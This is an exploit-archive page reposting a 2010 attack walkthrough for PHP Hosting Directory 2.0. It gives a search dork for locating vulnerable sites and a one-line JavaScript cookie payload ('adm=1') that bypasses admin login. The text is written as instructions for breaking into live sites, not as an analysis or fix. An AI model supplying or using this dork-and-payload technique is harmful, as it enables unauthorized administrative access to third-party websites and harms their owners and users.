PHP Hosting Directory 2.0 Insecure Cookie

PHP Hosting Directory 2.0 Insecure Cookie: Posted Oct 11, 2010; Authored by ruiner_blackhat; PHP Hosting Directory version 2.0 suffers from an insecure cookie vulnerability that allows for administrative bypass.; tags | exploit, php, insecure cookie handling; SHA-256 | 8b150cf2936f99115684a3763f8f6bc8f9d49535e8f94782cfb587b14f4f239b; Download | Favorite | View

PHP Hosting Directory 2.0 Insecure Cookie

-----------------------------------------------------------------------                                                                 
   ####            ##       ##                                    
   ####o           ##                                            
   ####X   .@##%   ##@@#@   ##  #@  @#   @##@   ###%##X   X##@    
   ##@##   ##@X#%  ##@X##%  ##  ##  ##  ##X@##  ###X@##  o##@##   
  o#  ##   ##  ##  ##  ###  ##  X#  ##  ## o##  ###  ##  @## ##%  
  %#  ##   ##X     ##  ###  ##   #  #@     X##  ###  ##  ###X###  
  ##  ##   X##@    ##  ###  ##   #X #X    %###  ###  ##  #######  
  ##  @#o    ###   ##  ###  ##   #@%#o  @#o%##  ###  ##  ###
  ######X     ##@  ##  ###  ##   %###   ##  ##  ###  ##  ### ###  
  ##X.@#@  #  ###  ##  ###  ##   o###   ##  ##  ###  ##  @##o##@  
  #@   ##  #@X##X  ##  ###  ##    ###   ##X@##  ###  ##   ##@##   
  #X   ##   @##%   ##  ###  ##   X##%   %#@@##  ###  ##    ###X   
-----------------------------------------------------------------------
 
 
-----------------------------------------------------------------------
-----------------------------------------------------------------------
ByPass PHP Hosting Version 2
-----------------------------------------------------------------------
-----------------------------------------------------------------------
 
-----------------------------------------------------------------------
# Exploit Title: [Php Hosting Admin Bypass]
# Date: [2010.10.10]
# Author: [ruiner_blackhat]
# Version: [Versin 2]
# My Group Web: [www.ashiyane.org/forums]
-----------------------------------------------------------------------
Hi
With this exploit you how to bypass the admin panel will hear
php hosting versin 2
-----------------------------------------------------------------------
Initially following dork in your searches:
 
Dork: "powered by PHP Hosting Directory 2.0"
 
After selecting one of the sites compiled by the admin panel.for example:
 
site.com/admin
 
Do not write anything in the password.
Enter the code below url and press enter.
 
javascript:document.cookie = "adm=1; path=/";
 
After being loaded with the error page and check back to refresh and
enter the portal panel Admin.
-----------------------------------------------------------------------
 
GoodLucK ;)
 
http://www.ashiyane.org/forums

Top Authors In Last 30 Days

Red Hat 328 files
Ubuntu 56 files
Gentoo 32 files
Debian 24 files
Apple 9 files
malvuln 6 files
nu11secur1ty 5 files
Google Security Research 4 files
Jann Horn 4 files
Adam Gowdiak 4 files

File Archives

Systems

AIX (429)
Apple (2,088)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,047)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,790)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,914)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,521)
UNIX (9,404)
UnixWare (187)
Windows (6,660)
Other

PHP Hosting Directory 2.0 Insecure Cookie

PHP Hosting Directory 2.0 Insecure Cookie

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHP Hosting Directory 2.0 Insecure Cookie

Share This

PHP Hosting Directory 2.0 Insecure Cookie

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems